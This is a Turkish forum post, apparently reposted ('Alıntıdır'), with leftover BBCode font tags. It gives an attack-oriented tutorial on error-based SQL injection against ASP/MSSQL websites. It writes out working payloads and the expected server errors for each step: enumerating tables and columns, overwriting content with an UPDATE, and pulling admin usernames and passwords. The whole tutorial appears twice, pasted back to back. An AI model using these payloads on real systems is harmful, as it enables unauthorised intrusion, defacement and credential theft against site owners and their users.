[FONT=Verdana, Arial, Helvetica, sans-serif]MsSQL SQL Injection İçin En Uygun Sistemdir.Çünkü MsSQL Injectionda İş Access Gibi
Deneme/Yanılma Değildir.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Bir Sonuç Varsa %100 dür ( Her türlü olumlu ya da olumsuz)[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Accessde iş tahmindir,fakat mssql böyle değildir.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
MsSQL Injection İle çok şey yapabilirsiniz.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Mesela ?[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
MsSQL Root ( Root Olma ) [/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
MssQL Update (Update yapma )[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
MsSQL **** ( **** atma index yedirme )[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
vs. vs. bir çok şey yapabilirsiniz.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Fakat ben işin attack kısmına bakacağım.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Sitemize girdik,[/FONT]
lor=#0000cc www.x.com/a.asp?id=1
[FONT=Verdana, Arial, Helvetica, sans-serif]
Sonuna ’a yazdık ve enterladık >> [/FONT] color=#0000cc www.x.com/a.asp?id=1’a
[FONT=Verdana, Arial, Helvetica, sans-serif]
Bize şöyle bir hata vermesi lazım,[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]---------------------------------------------------[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]Microsoft OLE DB Provider for ODBC Drivers error ’80040e14’[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif][Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ’a’.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]------------------------------------------------[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Bu hatayı aldık mı ? İşte bu siteye her bir şeyi yapabiliriz.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Mesela?[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Update yapabiliriz [/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Update yapılması için tablo ve kolon adlarını bilmemiz gerekir.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Sitemizin linkinin yanına having 1=1 yazalım vede tablo ve kolon adını öğrenelim.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Yani [/FONT] color=#0000cc www.x.com/a.asp?id=1[FONT=Verdana, Arial, Helvetica, sans-serif] having 1=1[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Column ’Admin.ID’ is invalid in the select list because it is not contained in an aggregate
function and there is no GROUP BY clause.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Şöyle bir hata aldık.Bu şu demektir.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]Admin tablosunda ID adlı bir kolon var.Diğer kolon adlarını bulmak için;[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Linkimizin yanına group by title having 1=1 ekleyelim.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Yani >> [/FONT] color=#0000cc www.x.com/a.asp?id=1[FONT=Verdana, Arial, Helvetica, sans-serif] group by title having 1=1[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Böylece diğer kolonları da bulabiliriz.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Ardından aşağıdaki gibi de update yapabiliriz.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
update TabloAdı set KolonAdı=’Buraya yazmak istediğiniz bir yazıyı yazın’;--[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
şekilde update yapabiliriz.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Tablo adlarına tek tek bakarak sitenin gizli bilgilerini(Şifre vs.) alabiliriz[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Sitemizin linkinin yanına and 1=convert(int,(select top 1 name from sysobjects)) yazalım ve de
karşımıza çıkan ilk tablo adını bulalım.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Yani;[/FONT]
color=#0000cc www.x.com/a.asp?id=1[FONT=Verdana, Arial, Helvetica, sans-serif] and 1=convert(int,(select top 1 name from sysobjects))[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Şöyle bir hata vermesi lazım;[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]------------------------------------------------------------[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]Microsoft OLE DB Provider for SQL Server error ’80040e07’[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]Conversion failed when converting the nvarchar value ’AdminVerify’ to data type int.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]------------------------------------------------------[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Üstteki AdminVerify karşımıza çıkan ilk tablodur.Büyük ihtimal bütün şifreler vs. orda[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Diyelim AdminVerify çıkmadı.Poll Diye bi tablo çıktı.Bu tabloda şifreler vs. yok.Ben nası
ulaşabilirim?[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Linkimizin yanına and 1=convert(int,(select top 1 name from sysobjects where name>’tablo adı’)) ekleyelim.Tablo adı bölümüne Üstteki İlk çıkan tablo adını yazalım ve de diğer tabloyu çıkartalım.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
İşte böyle gide gide bulabiliriz.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]ya da tablo adı bölümüne a yazalım.Böylece "a" karakterinden büyük olan ilk tablonun adını öğrenebiliriz.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Mesela ben bi ara u yazdım ve de users adlı bi tablo olduğunu fark ettim.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]Ama yinede en garantili yok üstteki gibidir.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]Şimdi kolon adı bulma,[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Örnek tablomuz AdminVerify olsun.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]and 1=convert(int, (select top 1 name from syscolumns where colid=1 and id=(select top 1 id from sysobjects where xtype=’u’ and name=’tablo adı’)))[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Linkimizin ucuna bunu ekleyelim.Sağ tarafta bulunan tablo adı yerine AdminVerify yazalım.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]Böylece AdminVerify adlı tablomuzdan çıkan ilk kolon adını bulabiliriz.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]üstteki colid=1 yerini colid=2 yapalım.Böylece 2. kolon adını bulabiliriz.3 yapalım , 3. kolon adını bulabiliriz.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Her şeyi bulduk diyelim.Nasıl username ve pass çıkarıcaz?[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]and 1=convert(int,(select top 1 KolonADı from Tablo Adı))[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]Linkimizin yanına bunu ekleyelim.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]Kolon adı yerine kolon adımızı (Örnek : ID )[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]tablo adımızın yerine de tablo adını ( Örnek : AdminVerify)[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]İşte böylece username ve pass çıkarabiliriz.[/FONT]
Saygılarımla,
Alıntıdır.
Deneme/Yanılma Değildir.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Bir Sonuç Varsa %100 dür ( Her türlü olumlu ya da olumsuz)[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Accessde iş tahmindir,fakat mssql böyle değildir.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
MsSQL Injection İle çok şey yapabilirsiniz.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Mesela ?[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
MsSQL Root ( Root Olma ) [/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
MssQL Update (Update yapma )[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
MsSQL **** ( **** atma index yedirme )[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
vs. vs. bir çok şey yapabilirsiniz.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Fakat ben işin attack kısmına bakacağım.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Sitemize girdik,[/FONT]
lor=#0000cc www.x.com/a.asp?id=1
[FONT=Verdana, Arial, Helvetica, sans-serif]
Sonuna ’a yazdık ve enterladık >> [/FONT] color=#0000cc www.x.com/a.asp?id=1’a
[FONT=Verdana, Arial, Helvetica, sans-serif]
Bize şöyle bir hata vermesi lazım,[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]---------------------------------------------------[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]Microsoft OLE DB Provider for ODBC Drivers error ’80040e14’[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif][Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ’a’.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]------------------------------------------------[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Bu hatayı aldık mı ? İşte bu siteye her bir şeyi yapabiliriz.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Mesela?[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Update yapabiliriz [/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Update yapılması için tablo ve kolon adlarını bilmemiz gerekir.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Sitemizin linkinin yanına having 1=1 yazalım vede tablo ve kolon adını öğrenelim.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Yani [/FONT] color=#0000cc www.x.com/a.asp?id=1[FONT=Verdana, Arial, Helvetica, sans-serif] having 1=1[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Column ’Admin.ID’ is invalid in the select list because it is not contained in an aggregate
function and there is no GROUP BY clause.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Şöyle bir hata aldık.Bu şu demektir.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]Admin tablosunda ID adlı bir kolon var.Diğer kolon adlarını bulmak için;[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Linkimizin yanına group by title having 1=1 ekleyelim.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Yani >> [/FONT] color=#0000cc www.x.com/a.asp?id=1[FONT=Verdana, Arial, Helvetica, sans-serif] group by title having 1=1[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Böylece diğer kolonları da bulabiliriz.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Ardından aşağıdaki gibi de update yapabiliriz.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
update TabloAdı set KolonAdı=’Buraya yazmak istediğiniz bir yazıyı yazın’;--[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
şekilde update yapabiliriz.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Tablo adlarına tek tek bakarak sitenin gizli bilgilerini(Şifre vs.) alabiliriz[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Sitemizin linkinin yanına and 1=convert(int,(select top 1 name from sysobjects)) yazalım ve de
karşımıza çıkan ilk tablo adını bulalım.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Yani;[/FONT]
color=#0000cc www.x.com/a.asp?id=1[FONT=Verdana, Arial, Helvetica, sans-serif] and 1=convert(int,(select top 1 name from sysobjects))[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Şöyle bir hata vermesi lazım;[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]------------------------------------------------------------[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]Microsoft OLE DB Provider for SQL Server error ’80040e07’[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]Conversion failed when converting the nvarchar value ’AdminVerify’ to data type int.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]------------------------------------------------------[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Üstteki AdminVerify karşımıza çıkan ilk tablodur.Büyük ihtimal bütün şifreler vs. orda[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Diyelim AdminVerify çıkmadı.Poll Diye bi tablo çıktı.Bu tabloda şifreler vs. yok.Ben nası
ulaşabilirim?[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Linkimizin yanına and 1=convert(int,(select top 1 name from sysobjects where name>’tablo adı’)) ekleyelim.Tablo adı bölümüne Üstteki İlk çıkan tablo adını yazalım ve de diğer tabloyu çıkartalım.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
İşte böyle gide gide bulabiliriz.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]ya da tablo adı bölümüne a yazalım.Böylece "a" karakterinden büyük olan ilk tablonun adını öğrenebiliriz.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Mesela ben bi ara u yazdım ve de users adlı bi tablo olduğunu fark ettim.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]Ama yinede en garantili yok üstteki gibidir.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]Şimdi kolon adı bulma,[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Örnek tablomuz AdminVerify olsun.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]and 1=convert(int, (select top 1 name from syscolumns where colid=1 and id=(select top 1 id from sysobjects where xtype=’u’ and name=’tablo adı’)))[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Linkimizin ucuna bunu ekleyelim.Sağ tarafta bulunan tablo adı yerine AdminVerify yazalım.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]Böylece AdminVerify adlı tablomuzdan çıkan ilk kolon adını bulabiliriz.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]üstteki colid=1 yerini colid=2 yapalım.Böylece 2. kolon adını bulabiliriz.3 yapalım , 3. kolon adını bulabiliriz.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Her şeyi bulduk diyelim.Nasıl username ve pass çıkarıcaz?[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]and 1=convert(int,(select top 1 KolonADı from Tablo Adı))[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]Linkimizin yanına bunu ekleyelim.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]Kolon adı yerine kolon adımızı (Örnek : ID )[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]tablo adımızın yerine de tablo adını ( Örnek : AdminVerify)[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]İşte böylece username ve pass çıkarabiliriz.[/FONT]
Saygılarımla,
Alıntıdır.